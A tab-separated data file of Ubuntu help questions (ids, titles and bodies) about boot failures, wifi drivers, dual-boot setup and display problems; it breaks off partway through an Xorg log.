458907	cryptsetup failed - but manual cryptsetup luksopen worked	i boot my ubuntu 14.04 and it doesnt accept my password . some trys later , busybox start . the following command mount my root dir in /mnt echo -n `` passw0rd1 '' | cryptsetup luksopen /dev/sda5 crypt1 mount /dev/mapper/ubuntu -- vg-root /mnt why the automatic boot does not succes ? i habe a german keyboard layout . and how can i boot in the primary system after the above commands .
458910	ubuntu wubi error : no such device	i know this question has been already asked but i think mine is quite different because my ubuntu is installed via wubi not live-dvd . i 'm using ubuntu 12.04 , and everything works fine , i have two portions , c for windows and d for data storage ( and where ubuntu is installed ) i have run out of space on c so i extended it this tomorrow , after that ubuntu refused booting giving error : no such device : '' numbers '' i have many important stuff on root.disk and i do n't know what to do . please could someone tell me how to fix that ? i have searched around i have found many methods and i do n't know which one the suites me .
458911	going back to gui mode in ubuntu 12.04	i just removed some important libs and packages like glib n gstreamer from my ubuntu 12.04 . now i ca n't go back to gui mode . it shows some thing like `` failed to load ubuntu session '' . but i can access all my files from command mode . how i can get back to gui mode ... ?
458912	installing usb modem on ubuntu 14.04	i 'm trying to connect to internet using teracom t -u500 usb modem . when i insert it , my dmesg shows : [ 3895.188034 ] usb 3-2 : new full-speed usb device number 4 using uhci_hcd [ 3895.355048 ] usb 3-2 : new usb device found , idvendor=15eb , idproduct=7153 [ 3895.355053 ] usb 3-2 : new usb device strings : mfr=1 , product=2 , serialnumber=11 [ 3895.355057 ] usb 3-2 : product : cbp7.0 [ 3895.355060 ] usb 3-2 : manufacturer : china telecom [ 3895.355064 ] usb 3-2 : serialnumber : \xffffffc3\xffffffbf\xffffffbf\xffffffc3\xffffffbf\xffffffbf\xffffffc3\xffffffbf\xffffffbf\xffffffc3\xffffffbf\xffffffbf\xffffffc3\xffffffbf\xffffffbf\xffffffc3\xffffffbf\xffffffbf\xffffffc3\xffffffbf\xffffffbf\xffffffc3\xffffffbf\xffffffbf\xffffffc3\xffffffbf\xffffffbf\xffffffc3\xffffffbf\xffffffbf [ 3895.363081 ] usb-storage 3-2:1.0 : usb mass storage device detected [ 3895.363153 ] scsi10 : usb-storage 3-2:1.0 [ 3896.364078 ] scsi 10:0:0:0 : cd-rom evdo rev a 7.00 pq : 0 ansi : 2 [ 3896.376056 ] sr1 : scsi-1 drive [ 3896.376211 ] sr 10:0:0:0 : attached scsi cd-rom sr1 [ 3896.376275 ] sr 10:0:0:0 : attached scsi generic sg2 type 5 [ 3896.426579 ] systemd-udevd [ 10874 ] : failed to apply acl on /dev/sr1 : no such file or directory [ 3896.426589 ] systemd-udevd [ 10874 ] : failed to apply acl on /dev/sr1 : no such file or directory [ 3896.431477 ] systemd-udevd [ 10855 ] : failed to apply acl on /dev/sr1 : no such file or directory [ 3896.431487 ] systemd-udevd [ 10855 ] : failed to apply acl on /dev/sr1 : no such file or directory [ 3896.435025 ] systemd-udevd [ 10855 ] : failed to apply acl on /dev/sr1 : no such file or directory [ 3896.435034 ] systemd-udevd [ 10855 ] : failed to apply acl on /dev/sr1 : no such file or directory i 'm not sure why it fails to apply acl on device . what does it mean ? i use ubuntu 14.04 .
458914	jagged screen edges	i see constant jagged lines on my screen . they start appearing after using ubuntu for an hour or so . this has been a constant issue ever since last few ubuntu releases . i am using intel dg31pr motherboard with onboard graphics on a core 2 duo system . an currently using ubuntu 14.04 64 bit edition . error has been occuring since v12.04 as far as i remember . they start appearing randomly on icons and keep coming and going away . here are some screenshots : what to do ?
458917	compiz extra animations download ubuntu 14.04 not working ( burning animations etc )	i have installed ubuntu 14.04 on my dell latitude yesterday , i wanted some cool window animations so i installed compiz and also ( at least , that is what i have tried to do ) , installed the extra animations that are available . i used the terminal with the following command to install the extra package : sudo apt-get install compizconfig-settings-manager compiz-plugins-extra when i finally had set up everything , i wanted to use a burning effect on the closing animation , however , i couldn´t even find that animation in the list ! what i have seen is that i have to turn on ´´animation addon´´ to use those animations , but i don´t have that option.. is there any way to get the extra effects on compiz with ubuntu 14.04 ? or are the effects removed because they were unstable ?
458918	how to delete extracted files	i was trying to install some custom themes on my computer running ubuntu 12.04 lts yesterday , but with little success . the next day i realized that my failed attempts at getting a theme going resulted in thousands of files from various archives clogging up my /home directory . does anyone know of a way to easily get rid of these files , besides going through each 7z , zip , and tar.gz file i downloaded and deleting each file individually ?
458920	installing gnome 2 on ubuntu 13.04	i have ubuntu 13.04 , which has gnome 3 by default.i want to completely remove gnome 3 and install gnome 2 . i know that installing an older version may cause some problems , but i am okey with it.so what repositories should i add to my list of repositories.and how can i specify the exact version that i want from the apt-get command . i do not think that thing like apt-get gnome 2 will work . i thought of downloading all the needed packages from here , but it will be so troublesome to download all the packages and solve the dependency issues
458923	task bar clock problems	hi having problems with the clock in kubuntu wont remain set at the right time keeps reverting to uk utc one hour behind everytime i reset and change to manual it just changes as soon as i go online.please do n't give me comand line stuff totally new to linux just want one click fix if none available then i 'll live with it , but i must say it 's these sort of things that make people not adopt linux . thanks
458929	copy a file from ubuntu server to a nas drive	i would like to use a script to copy a sql file to a nas drive location . for example it would copy backup.sql to //10.1.1.124/backup/backups .
458930	can not delete user	i am trying to uninstall logstash , but sudo apt-get remove logstash fails because the user is being used by a process . if i try to manually delete the logstash user , i can not because even when i kill the process , a new one immediately pops up . for example , if i check for processes using logstash : ps -fp $ ( pgrep -u logstash ) i get uid pid ppid c stime tty time cmd logstash 17376 1 99 10:04 ? 00:00:10 /usr/bin/java -djava.io.tmpdir=/ then i try to kill the process and delete the user : sudo killall -kill -u logstash sudo userdel logstash but now logstash is already being used by another process : userdel : user logstash is currently used by process 17794 how can i delete the logstash user ?
458931	unpack a war file to a destination folder without verbose output	i need to extract a war file with unzip without verbose output i am doing it like this - unzip myfile.war -d /home/app/ but this creates verbose output . how can i prevent that ?
458932	find out ubuntu one account	is there a way to find which account i 'm currently connected to with ubuntu one on linux ? i uploaded lots of files and while it says upload is complete , they do n't appear in the ubuntu one account i thought i 'm using .
458933	middle button does `` back '' in browser , how to disable ?	i 'm using kde and for some reason my middle mouse button activates `` back '' in both firefox and chrome . i can not find anything about those browsers to disable it , so presume it is some kind of global behaviour . how would i disable/change this behaviour ?
458937	trying to install ubuntu 14.04 lts on win 8 tablet - acer iconia w3	i am trying to install ubuntu 14.04 lts on win 8 tablet , acer iconia w3 . i have tried to boot from usb and dvd via usb drive . any help would be appreciated . i am looking to wipe windows 8 completely and only run ubuntu 14.04 lts . thank you !
458939	after starting upgrade to ubuntu 14.04 and reverting to 13.10 , eclipse pydev debugger stopped working	i started the upgrade to ubuntu 14.04 , but it failed and the system reverted back to old settings . i have been convinced to stay with 13.10 for now . however , when running python code in eclipse with pydev , the code runs but not in debug mode . i 've tried uninstalling and re-installing pydev to no avail . maybe i should re-configure some environment variables ? i am using eclipse 3.8 and pydev 3.4.1
458940	backup during ubuntu upgrade	i want to upgrade my ubuntu from 13.10 to 14.04 . is it possible and safe to backup my home folder in different disk partition in the same system and restore it later , after upgrading my os ?
458944	how to set valid host and domain names in ubuntu 12.04 to avoid java exceptions ?	how could i set a valid host name to avoid this exception caused by : com.google.protobuf.serviceexception : java.net.unknownhostexception : invalid host name : local host is : ( unknown ) ; destination host is : `` '' fatima-hp-probook-4520s '' :8042 ; java.net.unknownhostexception ;
458946	on xubuntu , my windows suddenly have no control buttons on the upper right hand corner	since windows can not be resized or closed , i have to use ctrl+w most of the time . also , i can not use alt+tab to switch from one window to another . both problems prevent me from using more than one window effectively .
458947	should i create the reserved bios boot area partition ?	i have asus n550jv with windows 8 installed . i want to install ubuntu 14.04 lts in a dual boot setup . i am not familiar with turning off `` fast boot '' , disabling `` secure boot '' and enabling `` launch csm '' . i created three logical paritions ( 50gb `` / '' , 16gb `` /swap '' and 150gb `` /home '' ) . later the installation gives this error : the partition table format in use on your disks normally requires you to create a separate partition for boot loader code . this partition should be marked for use as âreserved bios boot areaâ and should be at least 1 mb in size . note that this is not the same as a partition mounted on /boot . if you do not go back to the partitioning menu and correct this error , bootloader installation may fail later , although it may still be possible to install the boot loader to a partition . i searched on the net and found that both who tried to create that partition and those who just skipped are loosing access to one or both the installed os-es . many users ended up reinstalling the whole disk from zero . three more partitions at last : /dev/sda5 ntfs 570gb 1gb /dev/sdz6 ntfs 21gb 14gb free space 0mb i would like , before applying one of the two choices ( create that 1mb partition or not ) , to learn how to to avoid loosing os access ?
458949	what is `` feature definition freeze '' ?	in the trusty tahr release schedule there are two phases called feature definition freeze and feature freeze . it is pretty clear what the latter means but the wiki description of the first is not so clear . what happens with this phase ?
458953	why i got no upgrade notification after updating ?	i updated 13.10 and want to upgrade to 14.04 . i modified the options in order to get every notification about upgrading . i get however , only the following notification : the sofwar in this computer is up to date . according to every source i have consulted so far , in order to upgrade , i should get automatically the additional message : however , ubuntu 14.04 is now available ( you have 13.10 ) the problem is that i do n't get that message displayed . how could i upgrade ?
458954	chromium 's omnibox has to big font size and spans 100 %	i just upgraded from xubuntu 13.10 to 14.04 which comes with a new version of chromium , namely version 34.0.1847.116 ubuntu 14.04 aura ( 260972 ) . it uses the new aura design , indicated by the small blue `` a '' on the menu button . since this version the font of the omnibox/address bar is way bigger than before and additionally the omnibox spans 100 % of the window now . is this a bug or is this part of the new design ?
458957	dual boot compaq presario cq56 win 8 ubuntu 14	i 've got installed win 8.1 on my presario cq56 and the laptop has 4 primary partitions . one of them is reserved to install ubuntu 14 . so when i try install ubuntu alongside windows , to continue , the laptop must restart , but then it does n't continue the installation , all the ubuntu setup restarts again asking me the language and the installation option . i tried to find secure boot options in bios ( insyde h20 setup utility , bios version f.02 ) but theres no options about it . in security options there is just an option to create a bios password which is deactivated . what should i do ? is the problem about secure boot ?
458959	why wo n't ubuntu let me log in ?	i installed ubuntu 14.04 but after installation i can not log in with my password . i tried the tried-and-tested route of resetting a password ( rebooting into root console , remounting / with rw , running passwd user ) and it said `` password changed successfully '' ... but after rebooting i still could n't log in ! i then did the same but created a new user ... and still ca n't log in ! what 's going on ? !
458961	installation of ubuntu 12.04 from pen drive	i made the pen drive bootable by using following link http : //www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/ but after installation is finished successfully . it is telling unable to load os . if i am trying to reinstall it is showing a ubuntu is installed already . please guide me appropriately .
458963	ubuntu does not activate acer v3-571g wifi	i have an acer aspire with a qualcomm atheros ar9462 wireless network adapter . the wireless indicator does not light up and the system does not respond to the hardware wifi switch ( fn - f3 combo ) . the debian system on this computer does not have this problem .
458965	how to stop xfce from reconfiguring monitor layout when laptop lid is closed ?	i recently upgraded to xubuntu 14.04 on my laptop . prior to 14.04 , i used xrandr ( through a script ) to configure my preferred layout , which involved an external vga monitor and the built in laptop monitor . prior to 14.04 , when i closed the lid with that layout active , the layout remained the same ( ie , the built-in monitor was off , but still present in the layout ) . after upgrading to 14.04 , my xrandr layout is retained only for as long as i do n't close the lid on the laptop . after the lid is closed , the external monitor is reconfigured as the only display . after the lid is reopened , xfce seems to restore whatever configuration i had set for the two monitors in the displays dialog prior to closing the lid . this is suboptimal for me , as i can not make the monitors bottom-aligned through that dialog , which is why i 'd prefer my xrandr layout be respected through lid closes . a previous question suggests looking into acpi configuration and removing lid close scripts there , but i seem to have no scripts that do anything with the lid in /etc/acpi . i also have n't been able to find anything to do with lid closes in /etc/udev . xfce power manager is set to do nothing with lid closes , and that setting seems to be respected â if i set it to suspend , it suspends . the `` configure new displays when connected '' checkbox in xfce display settings is unchecked .
458967	ubuntu 14.04 : my computer sees the wireless network , but wo n't connect to it , keeps asking for the wpa password	specs : computer : sony vaio vgn-nw240f wifi card : network controller : qualcomm atheros ar9285 wireless network adapter ( pci-express ) ( rev 01 ) more information ( lspci -vv -s ) : subsystem : foxconn international , inc. t77h126.00 802.11bgn wireless half-size mini pcie card control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 17 region 0 : memory at d2500000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : ath9k and even more ( modinfo ath9k ) filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k.ko license : dual bsd/gpl description : support for atheros 802.11n wireless lan cards . author : atheros communications srcversion : baf225eeb618908380b28da alias : platform : qca955x_wmac alias : platform : ar934x_wmac alias : platform : ar933x_wmac alias : platform : ath9k alias : pci : v0000168cd00000036sv*sd*bc*sc*i* alias : pci : v0000168cd00000036sv0000185fsd00003027bc*sc*i* [ alias ... ] depends : ath9k_hw , mac80211 , ath9k_common , cfg80211 , ath intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : 00 : a5 : a6:57:59 : de:47:4b : c5 : c4:31:20:88:0c:1b:94 : a5:39 : f4:31 sig_hashalgo : sha512 parm : debug : debugging mask ( uint ) parm : nohwcrypt : disable hardware encryption ( int ) parm : blink : enable led blink on activity ( int ) parm : btcoex_enable : enable wifi-bt coexistence ( int ) parm : bt_ant_diversity : enable wlan/bt rx antenna diversity ( int ) parm : ps_enable : enable wlan powersave ( int ) my network works perfectly well with this computer on windows 7 , and with various other computers and devices . i installed ubuntu 14.04 today , and it works perfectly , except for the wifi . when i try to connect ( wifi icon , name_of_network ) , a popup asking for the password keeps appearing every minute or so , and it does not connect . the password is correct . i tried to delete the network from the connection list ( wifi icon , edit connections ) , restart my computer and try again , to no avail . ethernet works perfectly . i have to assume that it is related to ubuntu , since the wireless card is recognized and can scan the different networks available . $ rfkill list 0 : sony-wifi : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no i am out of idea and do not know the architecture of ubuntu 14.04 well enough to even try anything . would you have suggestions ?
458968	synaptics touchpad synclient tapbutton2 option	i have a problem with my touchpad configuration . i would like to change the two-finger behaviour to middle button click , instead of right button . so i type in the console : synclient tapbutton2=2 and since then , when i tap with two fingers nothing happens . so to test it , i changed the tapbutton2 's value to 1 and it started to work as a left click , like it should . only the configuration with the middle button does not work , do you have any solution ? below is my synclient 's configuration : leftedge = 1769 rightedge = 5423 topedge = 1644 bottomedge = 4544 fingerlow = 25 fingerhigh = 30 maxtaptime = 180 maxtapmove = 238 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 emulatemidbuttontime = 75 emulatetwofingerminz = 282 emulatetwofingerminw = 7 vertscrolldelta = 108 horizscrolldelta = 108 vertedgescroll = 0 horizedgescroll = 0 cornercoasting = 0 verttwofingerscroll = 1 horiztwofingerscroll = 1 minspeed = 1 maxspeed = 1.75 accelfactor = 0.03688 updownscrolling = 0 leftrightscrolling = 1 updownscrollrepeat = 1 leftrightscrollrepeat = 1 scrollbuttonrepeat = 100 touchpadoff = 2 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 0 rbcornerbutton = 0 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 1 tapbutton2 = 2 tapbutton3 = 3 clickfinger1 = 1 clickfinger2 = 1 clickfinger3 = 0 circularscrolling = 0 circscrolldelta = 0.1 circscrolltrigger = 0 circularpad = 0 palmdetect = 0 palmminwidth = 10 palmminz = 200 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 30 pressuremotionmaxz = 160 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0 horizhysteresis = 27 verthysteresis = 27 clickpad = 0
458971	i am trying to install xubuntu 14.04 with minimal disc , but this has already failed 3 times	i am trying to install xubuntu 14.04 with minimal disc , but this has already failed 3 times . i have a 512 mb ram with 20 gb hard disk . 12.04 works fine . the installation with minimal disc ends ok , but then the machine will not start up . what am i doing wrong ?
458972	wine giving error but worked before	where can i ask wine questions or are this the right site . i installed ubuntu 14.04 and dual boot with 13.04 . then i installed wine in 14.04 . i loaded sophiesew and embird and they worked 100 % . after a few days of testing i decided i can now get rid off 13.04. i reinstalled 14.04 on the whole drive and also wine and the software . now i get the archive manager saying '' an error occurred while loading the archive '' when i unzip these programs . then i re-installed wine no go.then i downloaded the software again no go . i then re installed ubuntu 14.04 and wine and the soft ware . i still get the archive manager saying - an error occured while loading the archive . when i dual booted 13.04 and 14.04 it worked 100 % . now it do not work .
458974	ubuntu 14.04 intel 7260 ac wireless driver does not work properly	i have dell xps 13 developer edition with ubuntu 14.04 . actually when i bought the machine it came with ubuntu 12.04 . before upgrade to 14.04 the wireless driver was running perfectly . after upgrading to 14.04 the driver gets in broken mode . i can connect to saved networks but if i plan to connect to an unsaved network it does not work . when the qui gets in trouble i give a try to terminal by typing : $ iwlist scan the response is : lo interface does n't support scanning . virbr0 interface does n't support scanning . lxcbr0 interface does n't support scanning . wlan0 interface does n't support scanning . my driver info : $ sudo lshw -c network *-network description : ethernet interface product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 6b serial : 7c:7a:91:8c : df : fc width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical configuration : broadcast=yes driver=iwlwifi driverversion=3.5.0-48-generic firmware=22.0.6.0 ip=192.168.2.237 latency=0 link=yes multicast=yes resources : irq:58 memory : f0400000-f0401fff i am really in a big trouble . i can connect to any wifi network except saved wifi networks . if i can not find any solution i will downgrade to 12.04 again . what is the proper way using this driver with 14.04 ?
458976	thinkpad with optimus in low graphics mode after upgrade to 14.04	i upgraded my tp w520 with optimus from 13.10 to 14.04 under 13.10 optimus worked will . setup with the following : http : //www.unixreich.com/blog/2013/linux-nvidia-optimus-on-thinkpad-w520w530-with-external-monitor-finally-solved/ before the upgrade i removed xorg-edgers ppa with ppa-purge after the upgrade i restated and i only can enter the low graphics mode . i already tired to add xorg-edgers again and also to purge / reinstall bumblebee and nvidia but without success . i do n't know whats wrong ... update : when i open the console and use : sudo pkill -9 xorg and then : startx i get into unity . my xorg.0.log : cat /var/log/xorg.0.log [ 5.764 ] x.org x server 1.15.1 release date : 2014-04-13 [ 5.764 ] x protocol version 11 , revision 0 [ 5.764 ] build operating system : linux 3.2.0-37-generic x86_64 ubuntu [ 5.764 ] current operating system : linux steve-thinkpad-w520 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 [ 5.764 ] kernel command line : boot_image=/boot/vmlinuz-3.13.0-24-generic root=uuid=50134307-3b47-46ea-babf-a6afc5482a7e ro quiet splash vt.handoff=7 [ 5.764 ] build date : 16 april 2014 01:36:29pm [ 5.764 ] xorg-server 2:1.15.1-0ubuntu2 ( for technical support please see http : //www.ubuntu.com/support ) [ 5.764 ] current version of pixman : 0.30.2 [ 5.764 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 5.764 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 5.765 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : thu may 1 17:14:36 2014 [ 5.767 ] ( == ) using config directory : `` /etc/x11/xorg.conf.d '' [ 5.767 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 5.771 ] ( == ) no layout section . using the first screen section . [ 5.771 ] ( == ) no screen section available . using defaults . [ 5.771 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 5.771 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 5.771 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 5.771 ] ( == ) automatically adding devices [ 5.771 ] ( == ) automatically enabling devices [ 5.771 ] ( == ) automatically adding gpu devices [ 5.772 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 5.772 ] entry deleted from font path . [ 5.772 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 5.772 ] entry deleted from font path . [ 5.772 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 5.772 ] entry deleted from font path . [ 5.772 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 5.772 ] entry deleted from font path . [ 5.772 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 5.772 ] entry deleted from font path . [ 5.772 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 5.772 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 5.772 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 5.772 ] ( ii ) loader magic : 0x7f0af3543d60 [ 5.772 ] ( ii ) module abi versions : [ 5.772 ] x.org ansi c emulation : 0.4 [ 5.772 ] x.org video driver : 15.0 [ 5.772 ] x.org xinput driver : 20.0 [ 5.772 ] x.org server extension : 8.0 [ 5.772 ] ( ii ) xfree86 : adding drm device ( /dev/dri/card0 ) [ 5.774 ] ( -- ) pci : * ( 0:0:2:0 ) 8086:0126:17aa:21d1 rev 9 , mem @ 0xf2400000/4194304 , 0xe0000000/268435456 , i/o @ 0x00006000/64 [ 5.774 ] ( -- ) pci : ( 0:1:0:0 ) 10de:0dda:17aa:21d1 rev 161 , mem @ 0xf0000000/33554432 , 0xc0000000/268435456 , 0xd0000000/67108864 , i/o @ 0x00005000/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 [ 5.775 ] initializing built-in extension generic event extension [ 5.775 ] initializing built-in extension shape [ 5.775 ] initializing built-in extension mit-shm [ 5.775 ] initializing built-in extension xinputextension [ 5.775 ] initializing built-in extension xtest [ 5.775 ] initializing built-in extension big-requests [ 5.775 ] initializing built-in extension sync [ 5.775 ] initializing built-in extension xkeyboard [ 5.775 ] initializing built-in extension xc-misc [ 5.775 ] initializing built-in extension security [ 5.775 ] initializing built-in extension xinerama [ 5.775 ] initializing built-in extension xfixes [ 5.775 ] initializing built-in extension render [ 5.775 ] initializing built-in extension randr [ 5.775 ] initializing built-in extension composite [ 5.775 ] initializing built-in extension damage [ 5.775 ] initializing built-in extension mit-screen-saver [ 5.775 ] initializing built-in extension double-buffer [ 5.775 ] initializing built-in extension record [ 5.775 ] initializing built-in extension dpms [ 5.775 ] initializing built-in extension present [ 5.775 ] initializing built-in extension dri3 [ 5.775 ] initializing built-in extension x-resource [ 5.775 ] initializing built-in extension xvideo [ 5.775 ] initializing built-in extension xvideo-motioncompensation [ 5.775 ] initializing built-in extension selinux [ 5.775 ] initializing built-in extension xfree86-vidmodeextension [ 5.775 ] initializing built-in extension xfree86-dga [ 5.775 ] initializing built-in extension xfree86-dri [ 5.775 ] initializing built-in extension dri2 [ 5.775 ] ( ww ) `` glamoregl '' will not be loaded unless you 've specified it to be loaded elsewhere . [ 5.775 ] ( ii ) `` glx '' will be loaded by default . [ 5.775 ] ( ww ) `` xmir '' is not to be loaded by default . skipping . [ 5.775 ] ( ii ) loadmodule : `` glx '' [ 5.780 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 5.796 ] ( ii ) module glx : vendor= '' x.org foundation '' [ 5.796 ] compiled for 1.15.1 , module version = 1.0.0 [ 5.796 ] abi class : x.org server extension , version 8.0 [ 5.796 ] ( == ) aiglx enabled [ 5.796 ] loading extension glx [ 5.796 ] ( == ) matched intel as autoconfigured driver 0 [ 5.796 ] ( == ) matched intel as autoconfigured driver 1 [ 5.796 ] ( == ) matched modesetting as autoconfigured driver 2 [ 5.796 ] ( == ) matched fbdev as autoconfigured driver 3 [ 5.796 ] ( == ) matched vesa as autoconfigured driver 4 [ 5.796 ] ( == ) assigned the driver to the xf86configlayout [ 5.796 ] ( ii ) loadmodule : `` intel '' [ 5.798 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 5.803 ] ( ii ) module intel : vendor= '' x.org foundation '' [ 5.803 ] compiled for 1.15.1 , module version = 2.99.911 [ 5.803 ] module class : x.org video driver [ 5.803 ] abi class : x.org video driver , version 15.0 [ 5.803 ] ( ii ) loadmodule : `` modesetting '' [ 5.803 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 5.804 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 5.804 ] compiled for 1.15.0 , module version = 0.8.1 [ 5.804 ] module class : x.org video driver [ 5.804 ] abi class : x.org video driver , version 15.0 [ 5.804 ] ( ii ) loadmodule : `` fbdev '' [ 5.804 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 5.805 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 5.805 ] compiled for 1.15.0 , module version = 0.4.4 [ 5.805 ] module class : x.org video driver [ 5.805 ] abi class : x.org video driver , version 15.0 [ 5.805 ] ( ii ) loadmodule : `` vesa '' [ 5.805 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 5.807 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 5.807 ] compiled for 1.15.0 , module version = 2.3.3 [ 5.807 ] module class : x.org video driver [ 5.807 ] abi class : x.org video driver , version 15.0 [ 5.807 ] ( ii ) intel : driver for intel ( r ) integrated graphics chipsets : i810 , i810-dc100 , i810e , i815 , i830m , 845g , 854 , 852gm/855gm , 865g , 915g , e7221 ( i915 ) , 915gm , 945g , 945gm , 945gme , pineview gm , pineview g , 965g , g35 , 965q , 946gz , 965gm , 965gme/gle , g33 , q35 , q33 , gm45 , 4 series , g45/g43 , q45/q43 , g41 , b43 [ 5.807 ] ( ii ) intel : driver for intel ( r ) hd graphics : 2000-5000 [ 5.807 ] ( ii ) intel : driver for intel ( r ) iris ( tm ) graphics : 5100 [ 5.807 ] ( ii ) intel : driver for intel ( r ) iris ( tm ) pro graphics : 5200 [ 5.807 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 5.807 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 5.807 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 5.807 ] ( ++ ) using vt number 7 [ 5.808 ] ( ii ) intel ( 0 ) : sna compiled : xserver-xorg-video-intel 2:2.99.911+git20140429.2fd1a05a-0ubuntu0ricotz~trusty ( rico tzschichholz < ricotz @ ubuntu.com > ) [ 5.809 ] ( ww ) falling back to old probe method for modesetting [ 5.810 ] ( ww ) falling back to old probe method for fbdev [ 5.810 ] ( ii ) loading sub module `` fbdevhw '' [ 5.810 ] ( ii ) loadmodule : `` fbdevhw '' [ 5.810 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 5.810 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 5.810 ] compiled for 1.15.1 , module version = 0.0.2 [ 5.810 ] abi class : x.org video driver , version 15.0 [ 5.810 ] ( ww ) falling back to old probe method for vesa [ 5.811 ] ( -- ) intel ( 0 ) : integrated graphics chipset : intel ( r ) hd graphics 3000 [ 5.811 ] ( -- ) intel ( 0 ) : cpu : x86-64 , sse2 , sse3 , ssse3 , sse4.1 , sse4.2 , avx [ 5.811 ] ( ii ) intel ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 5.811 ] ( == ) intel ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 5.811 ] ( == ) intel ( 0 ) : rgb weight 888 [ 5.811 ] ( == ) intel ( 0 ) : default visual is truecolor [ 5.811 ] ( ** ) intel ( 0 ) : framebuffer tiled [ 5.811 ] ( ** ) intel ( 0 ) : pixmaps tiled [ 5.811 ] ( ** ) intel ( 0 ) : `` tear free '' disabled [ 5.811 ] ( ** ) intel ( 0 ) : forcing per-crtc-pixmaps ? no [ 5.811 ] ( -- ) intel ( 0 ) : using a maximum size of 64x64 for hardware cursors [ 5.811 ] ( ii ) intel ( 0 ) : output lvds1 has no monitor section [ 5.811 ] ( -- ) intel ( 0 ) : found backlight control interface acpi_video0 ( type 'firmware ' ) for output lvds1 [ 5.811 ] ( ii ) intel ( 0 ) : output vga1 has no monitor section [ 5.811 ] ( ii ) intel ( 0 ) : output virtual1 has no monitor section [ 5.811 ] ( -- ) intel ( 0 ) : output lvds1 using initial mode 1920x1080 on pipe 0 [ 5.811 ] ( == ) intel ( 0 ) : dpi set to ( 96 , 96 ) [ 5.811 ] ( ii ) loading sub module `` dri2 '' [ 5.811 ] ( ii ) loadmodule : `` dri2 '' [ 5.811 ] ( ii ) module `` dri2 '' already built-in [ 5.812 ] ( ii ) unloadmodule : `` modesetting '' [ 5.812 ] ( ii ) unloading modesetting [ 5.812 ] ( ii ) unloadmodule : `` fbdev '' [ 5.812 ] ( ii ) unloading fbdev [ 5.812 ] ( ii ) unloadsubmodule : `` fbdevhw '' [ 5.812 ] ( ii ) unloading fbdevhw [ 5.812 ] ( ii ) unloadmodule : `` vesa '' [ 5.812 ] ( ii ) unloading vesa [ 5.812 ] ( == ) depth 24 pixmap format is 32 bpp [ 5.817 ] ( ii ) intel ( 0 ) : sna initialized with sandybridge ( gen6 , gt2 ) backend [ 5.817 ] ( == ) intel ( 0 ) : backing store enabled [ 5.817 ] ( == ) intel ( 0 ) : silken mouse enabled [ 5.817 ] ( ii ) intel ( 0 ) : hw cursor enabled [ 5.818 ] ( ii ) intel ( 0 ) : randr 1.2 enabled , ignore the following randr disabled message . [ 5.818 ] ( == ) intel ( 0 ) : dpms enabled [ 5.818 ] ( ii ) intel ( 0 ) : [ dri2 ] setup complete [ 5.818 ] ( ii ) intel ( 0 ) : [ dri2 ] dri driver : i965 [ 5.818 ] ( ii ) intel ( 0 ) : [ dri2 ] vdpau driver : i965 [ 5.818 